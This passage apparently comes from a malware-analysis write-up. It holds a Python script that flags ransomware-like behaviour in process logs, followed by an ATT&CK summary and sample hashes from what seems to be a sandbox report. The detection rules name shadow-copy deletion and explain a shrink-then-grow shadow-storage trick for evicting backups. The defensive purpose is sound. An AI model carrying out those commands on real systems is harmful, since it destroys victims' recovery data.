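                        ('list', 'writers'), ('resize', 'shadowstorage'), ('query', 'reverts'), ('revert', 'shadow')}
SYSTEM_DIRS = ('c:\\windows\\system32\\', 'c:\\windows\\syswow64\\')   # where a genuine svchost.exe lives
Proc = namedtuple('Proc', 'pid ppid image cmdline')
Finding = namedtuple('Finding', 'pid technique detail origin')   # origin: nearest ancestor that is not cmd.exe


def tokens(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted arguments whole (quotes stripped)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def option(words: Sequence[str], switch: str) -> Optional[str]:
    """Argument following a /switch (case-insensitive), or None."""
    low = [w.lower() for w in words]
    i = low.index(switch) if switch in low else -1
    return words[i + 1] if 0 <= i < len(words) - 1 else None


def origin_of(p: Proc, by_pid: Dict[int, Proc]) -> str:
    while p.ppid in by_pid:                      # walk up past cmd.exe wrappers to whoever chose the command
        p = by_pid[p.ppid]
        if not p.image.lower().endswith('\\cmd.exe'):
            break
    return p.image


def analyse(rows: Sequence[Tuple[int, int, str, str]]) -> List[Finding]:
    procs = [Proc(*r) for r in rows]
    by_pid = {p.pid: p for p in procs}
    out: List[Finding] = []
    resizes: Dict[str, List[Tuple[Proc, str]]] = defaultdict(list)   # volume -> (proc, /maxsize=) in tree order

    def add(p: Proc, technique: str, detail: str) -> None:
        out.append(Finding(p.pid, technique, detail, origin_of(p, by_pid)))

    for p in procs:
        exe, words = p.image.rsplit('\\', 1)[-1].lower(), tokens(p.cmdline)
        low = [w.lower() for w in words]
        if exe == 'svchost.exe' and not p.image.lower().startswith(SYSTEM_DIRS):
            add(p, 'T1036.005', 'svchost.exe running from ' + p.image)
        elif exe == 'vssadmin.exe':
            sub = tuple(low[1:3])
            if sub not in VSSADMIN_SUBCOMMANDS:    # e.g. "resize shadow": the call fails, the intent is still visible
                add(p, 'T1490', 'vssadmin has no subcommand ' + ' '.join(sub))
            elif sub[0] == 'delete':
                add(p, 'T1490', 'vssadmin ' + ' '.join(low[1:]))
            elif sub == ('resize', 'shadowstorage'):
                vol = next((w[5:] for w in low if w.startswith('/for=')), '?')
                resizes[vol].append((p, next((w[9:] for w in low if w.startswith('/maxsize=')), '?')))
        elif exe == 'schtasks.exe' and '/create' in low:
            name, action = option(words, '/tn') or '', option(words, '/tr') or ''
            if re.search(r'https?://', action):
                add(p, 'T1053.005', 'task "%s" opens a URL: %s' % (name, action))
        elif exe == 'attrib.exe' and '+h' in low and '+s' in low:
            target = next((w for w in words if '\\' in w), '')
            if '\\appdata\\' in target.lower():
                add(p, 'T1564.001', 'hidden+system attributes set on ' + target)
        elif exe == 'powershell.exe' and 'get-mppreference' in low:
            add(p, 'T1518.001', 'reads Defender configuration (Get-MpPreference)')
    # Shrink-then-grow: a quota below the space the existing shadow copies use evicts them; the
    # following unbounded resize restores the quota so the storage association looks untouched.
    for vol, seq in resizes.items():
        bounded = [s for _, s in seq if s != 'unbounded']
        if bounded and any(s == 'unbounded' for _, s in seq):
            add(seq[0][0], 'T1490', 'shadow storage on %s shrunk to %s then set back to unbounded' % (vol, bounded[0]))
    return out


if __name__ == '__main__':
    for f in analyse(PROCESSES):
        print(f.pid, f.technique, f.detail, '<-', f.origin)
```

Every T1490 finding comes back attributed to C:\Users\Admin\AppData\Local\Temp\svchost.exe rather than to the cmd.exe that launched vssadmin, which is the process a responder needs to look at; the same origin walk makes the attrib and schtasks findings land on the same parent.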
MITRE ATT&CK Enterprise v15
Execution
  Scheduled Task/Job (1): Scheduled Task (1)
  Windows Management Instrumentation (1)
Persistence
  Create or Modify System Process (2): Windows Service (2)
  Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
  Create or Modify System Process (2): Windows Service (2)
  Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
  Direct Volume Access (1)
  Hide Artifacts (4): Hidden Files and Directories (4)
  Impair Defenses (2): Disable or Modify Tools (2)
  Indicator Removal (2): File Deletion (2)
  Modify Registry (6)
Downloads
Filesize: 1KB
MD5: f6d83cb3ec0cf035c26b86a8009ab714
SHA1: 9c2d16be04908f2d28ce66b41ca4487b618534b3
SHA256: 2abe8a8f5bc11a760fed80a31be099fc4ffe88cf786ccec2d6b0610877910212
SHA512: 9f94dfc2f18ab2130698724a6a6e54c3ddb4f7695b60e71eaee9b2ed0ca09fdc30830bf70de450814260c771674988999b8b94bf78dec6cbb068c8bd073b1696

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 242KB (same hashes as the submitted sample)
MD5: 05e991bcf019b487f7ad4e896c77e988
SHA1: f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a
SHA256: cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
SHA512: 4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3